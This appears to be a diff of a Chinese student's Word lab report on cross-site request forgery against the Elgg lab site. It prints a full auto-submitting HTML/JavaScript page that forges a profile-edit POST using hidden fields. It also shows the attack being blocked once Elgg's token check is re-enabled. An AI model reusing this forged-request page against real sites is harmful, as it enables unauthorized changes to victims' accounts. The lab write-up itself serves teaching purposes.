+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>参数为</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">            // Submit the form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            p.submit();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">        }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">        // Invoke forge_post() after the page is loaded.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">        window.onload = function () { forge_post(); }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    &lt;/script&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>&lt;/body&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>&lt;/html&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>实验指导给的js代码有误</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>，使用了中文单引号，全部改为英文单引号。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>替换之前的index.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>html</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>，</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>并且注意，windows中</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>C</w:t>
-      </w:r>
-      <w:r>
-        <w:t>RLF</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>的换行符需要改为L</w:t>
-      </w:r>
-      <w:r>
-        <w:t>F</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>。</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>点击链接后自动跳转，得到如下页面，攻击成功。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="277D4B39" wp14:editId="71EB961A">
-            <wp:extent cx="3007252" cy="1434365"/>
-            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
-            <wp:docPr id="27" name="图片 27"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DB72163" wp14:editId="71F4468B">
+            <wp:extent cx="5274310" cy="2155190"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="25" name="图片 25"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2223,7 +1803,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3017739" cy="1439367"/>
+                      <a:ext cx="5274310" cy="2155190"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2236,104 +1816,25 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>Task</w:t>
-      </w:r>
-      <w:r>
-        <w:t>4</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>打开之前生成但是没有起作用的token验证。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>进入对应目录。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>cd  /var/www/CSRF/Elgg/vendor/elgg/elgg/engine/classes/Elgg</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>在</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ActionsService.php</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>找到</w:t>
-      </w:r>
-      <w:r>
-        <w:t>gatekeeper()</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>函数。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>注释掉第一句的return</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>true</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>看一下js文件给我们的提示，需要下面几个字段即可</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23934326" wp14:editId="130D1CF0">
-            <wp:extent cx="5274310" cy="2207260"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
-            <wp:docPr id="28" name="图片 28"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10E4AA3C" wp14:editId="5655257A">
+            <wp:extent cx="5274310" cy="696595"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
+            <wp:docPr id="26" name="图片 26"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2353,7 +1854,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5274310" cy="2207260"/>
+                      <a:ext cx="5274310" cy="696595"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2371,13 +1872,231 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>再次点击攻击链接，无法修改，无法自动跳转，一直自动刷新</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>，攻击失败。</w:t>
+        <w:t>填入我们的参数。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>代码如下：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;!doctype html&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;html lang="en"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>&lt;body&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    &lt;h1&gt;This page forges an HTTP POST request.&lt;/h1&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    &lt;script type="text/javascript"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        function forge_post() {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            var fields;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            // The following are form entries need to be filled out by attackers.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            // The entries are made hidden, so the victim won't be able to see them.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            fields += "&lt;input type='hidden' name='name' value='Alice'&gt;";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            fields += "&lt;input type='hidden' name='briefdescription' value='Boby is my Hero'&gt;";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            fields += "&lt;input type='hidden' name='accesslevel[briefdescription]' value ='2'&gt; ";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            fields += "&lt;input type='hidden' name='guid' value='42'&gt;";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            // Create a &lt;form&gt; element.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            var p = document.createElement("form");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            // Construct the form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            p.action = "http://www.csrflabelgg.com/action/profile/edit";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            p.innerHTML = fields;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            p.method = "post";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            // Append the form to the current page.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            document.body.appendChild(p);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">            // Submit the form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            p.submit();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        // Invoke forge_post() after the page is loaded.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        window.onload = function () { forge_post(); }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    &lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;/body&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>&lt;/html&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>实验指导给的js代码有误</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，使用了中文单引号，全部改为英文单引号。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>替换之前的index.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>html</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>并且注意，windows中</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:t>RLF</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>的换行符需要改为L</w:t>
+      </w:r>
+      <w:r>
+        <w:t>F</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>点击链接后自动跳转，得到如下页面，攻击成功。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2385,12 +2104,11 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5770F90D" wp14:editId="721B266B">
-            <wp:extent cx="5274310" cy="1300480"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="29" name="图片 29"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="277D4B39" wp14:editId="71EB961A">
+            <wp:extent cx="3007252" cy="1434365"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
+            <wp:docPr id="27" name="图片 27"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2410,6 +2128,243 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="3017739" cy="1439367"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>两个问题的答案</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>问题1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>通过对alice发起好友请求，查看提交的参数中的guid，从而获得alice的guid。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>问题</w:t>
+      </w:r>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>不可以，因为C</w:t>
+      </w:r>
+      <w:r>
+        <w:t>SRF</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>是事先写好的链接，像本次试验里需要构造一个guid参数，那么便限制了攻击范围只能是某个特定人。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Task</w:t>
+      </w:r>
+      <w:r>
+        <w:t>4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>打开之前生成但是没有起作用的token验证。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>进入对应目录。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>cd  /var/www/CSRF/Elgg/vendor/elgg/elgg/engine/classes/Elgg</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>在</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ActionsService.php</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>找到</w:t>
+      </w:r>
+      <w:r>
+        <w:t>gatekeeper()</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>函数。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>注释掉第一句的return</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>true</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23934326" wp14:editId="130D1CF0">
+            <wp:extent cx="5274310" cy="2207260"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
+            <wp:docPr id="28" name="图片 28"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId33"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="2207260"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>再次点击攻击链接，无法修改，无法自动跳转，一直自动刷新</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，攻击失败。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5770F90D" wp14:editId="721B266B">
+            <wp:extent cx="5274310" cy="1300480"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="29" name="图片 29"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId34"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="5274310" cy="1300480"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -2424,11 +2379,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2444,6 +2394,44 @@
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+  <w:endnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+  <w:endnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+</w:endnotes>
+</file>
+
+<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+  <w:footnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+</w:footnotes>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -2566,6 +2554,7 @@
     <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -2612,8 +2601,10 @@
     <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Grid" w:uiPriority="39"/>
+    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
     <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
     <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
@@ -2888,6 +2879,28 @@
       <w:szCs w:val="32"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="3">
+    <w:name w:val="heading 3"/>
